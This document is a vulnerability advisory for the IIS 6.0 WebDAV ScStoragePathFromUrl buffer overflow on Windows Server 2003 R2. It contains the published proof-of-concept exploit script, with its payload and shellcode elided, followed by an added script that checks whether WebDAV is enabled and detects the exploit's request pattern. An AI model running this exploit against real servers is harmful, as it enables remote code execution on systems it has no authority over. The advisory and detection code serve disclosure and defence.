Vulnerability Description: IIS 6.0 with the WebDAV service enabled has a buffer overflow vulnerability that leads to remote code execution. The exploit is currently stable against Windows Server 2003 R2; the vulnerability was already being exploited in the wild as early as July and August 2016.
Vulnerability Type: Buffer overflow
Vulnerability Level: high risk
Affected product: Microsoft Windows Server 2003 R2 running IIS 6.0 with the WebDAV service enabled (currently verified; other versions have not yet been verified)
Trigger function: ScStoragePathFromUrl
Additional information: ScStoragePathFromUrl is called twice while the request is processed (the PoC's If: header accordingly carries two <http://...> resource URLs)
Vulnerability details: A buffer overflow exists in the ScStoragePathFromUrl function of the WebDAV service in IIS 6.0 on Windows Server 2003. An attacker can execute arbitrary code by sending a PROPFIND request whose If: header begins with "<http://" and is overly long.
0X01 Exploitation conditions
IIS 6.0
WebDAV enabled (a PROPFIND request that succeeds, returning 207 or 200, shows that it is)
```python
# written by Zhiniang Peng and Chen Wu.
# Information Security Lab & School of Computer Science & Engineering,
# South China University of Technology Guangzhou, China
# ----------- Email: [email protected]
# Python 2 script as published. The long header payload and the shellcode are
# elided on this page; the elided parts are marked with '...'.
import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('127.0.0.1', 80))   # replace 127.0.0.1 with the target IP

pay = 'PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n'
# First overlong resource URL inside the If: header
pay += 'If: <http://localhost/aaaaaaa'
pay += '...'   # long header payload elided on this page
pay += '>'
# Second resource URL; ScStoragePathFromUrl is called once more for it
pay += ' (Not <locktoken:write1>) <http://localhost/bbbbbbb'
pay += '\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7...'   # remainder elided on this page
shellcode = '...'   # shellcode elided on this page
pay += shellcode
pay += '>\r\n\r\n'

print(pay)
sock.send(pay)
data = sock.recv(80960)
print(data)
sock.close()
```
Change sock.connect(('127.0.0.1', 80)) so that the IP address is the target's IP, then run the script; the calculator (calc.exe) pops up on the target server. The published shellcode only launches the calculator, so you need console or RDP access to the server to see the result.
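Two things a practitioner wants before and after running the PoC: a way to confirm the precondition above (does PROPFIND return 207 or 200?) and a way to recognise the request pattern from the vulnerability details (a PROPFIND with an overlong If: header that begins with <http://) in traffic or logs. The script below is an added example, not code from the advisory or from its authors. MAX_IF_LEN is an assumed threshold, not a value taken from the advisory or from IIS, and the sample request and responses at the bottom are constructed to have the shape of the PoC and of IIS 6 replies, not real captures.

```python
import socket

MAX_IF_LEN = 512   # assumed threshold for a "long" If: header; not from the advisory or IIS


def _parse_head(raw):
    """Split an HTTP/1.x request or response head into (start-line parts, headers).

    Header names are lower-cased bytes; any body after the blank line is ignored."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    start = lines[0].split(b" ", 2)
    if len(start) < 2:
        raise ValueError("malformed start line: %r" % lines[0])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return start, headers


# --- precondition check: is WebDAV enabled? --------------------------------

def build_propfind(host, path=b"/"):
    # Depth: 0 keeps the reply small; an empty body is treated as an allprop request.
    return (b"PROPFIND " + path + b" HTTP/1.1\r\nHost: " + host +
            b"\r\nDepth: 0\r\nContent-Length: 0\r\nConnection: close\r\n\r\n")


def webdav_enabled(propfind_response):
    """True when the PROPFIND reply is 207 Multi-Status or 200, as the
    precondition states; 405 or 501 means the method is not served."""
    start, _ = _parse_head(propfind_response)
    return int(start[1]) in (207, 200)


def probe(host, port=80, path=b"/", timeout=5.0):
    """Network round-trip against a real host: returns (enabled, raw_response)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_propfind(host.encode(), path))
        chunks = []
        while True:
            d = s.recv(4096)
            if not d:
                break
            chunks.append(d)
    raw = b"".join(chunks)
    return webdav_enabled(raw), raw


# --- detection: does a request have the overflow pattern? -------------------

def classify_request(raw):
    start, headers = _parse_head(raw)
    if_hdr = headers.get(b"if", b"")
    low = if_hdr.lower()
    return {
        "propfind_http_tag": start[0] == b"PROPFIND" and low.startswith(b"<http://"),
        "overlong_if": len(if_hdr) > MAX_IF_LEN,
        "two_http_tags": low.count(b"<http://") >= 2,   # one per ScStoragePathFromUrl call
        "if_len": len(if_hdr),
    }


def is_exploit_shaped(raw):
    c = classify_request(raw)
    # A tagged-list If: header with an absolute URL is legal WebDAV (RFC 4918),
    # so the URL alone is not enough evidence; the overflow needs the overlong header.
    return c["propfind_http_tag"] and c["overlong_if"]


# --- constructed samples (not captures) -------------------------------------

ENABLED_PROPFIND = (b"HTTP/1.1 207 Multi-Status\r\nServer: Microsoft-IIS/6.0\r\n"
                    b"Content-Type: text/xml\r\nContent-Length: 0\r\n\r\n")
DISABLED_PROPFIND = (b"HTTP/1.1 405 Method Not Allowed\r\nServer: Microsoft-IIS/6.0\r\n"
                     b"Allow: GET, HEAD, POST, OPTIONS, TRACE\r\nContent-Length: 0\r\n\r\n")

# An ordinary locked-resource PROPFIND: absolute URL in If:, but short.
BENIGN_REQUEST = (b"PROPFIND /docs/ HTTP/1.1\r\nHost: localhost\r\nDepth: 1\r\n"
                  b"If: <http://localhost/docs/a.txt> (<opaquelocktoken:abc-123>)\r\n"
                  b"Content-Length: 0\r\n\r\n")

# Shape of the PoC request with the payload replaced by filler bytes.
EXPLOIT_SHAPED_REQUEST = (b"PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n"
                          b"If: <http://localhost/aaaaaaa" + b"A" * 600 + b">"
                          + b" (Not <locktoken:write1>) <http://localhost/bbbbbbb"
                          + b"B" * 600 + b">\r\n\r\n")

if __name__ == "__main__":
    print("enabled sample:", webdav_enabled(ENABLED_PROPFIND))
    print("benign request:", is_exploit_shaped(BENIGN_REQUEST))
    print("PoC-shaped request:", is_exploit_shaped(EXPLOIT_SHAPED_REQUEST))
```

Run probe("target-ip") to test a live host; it sends only a harmless Depth: 0 PROPFIND. The detection deliberately requires both the <http:// resource tag and the overlong header, because WebDAV clients legitimately send If: <http://host/path> (<lock-token>) for locked resources and flagging that alone would drown a SOC in false positives.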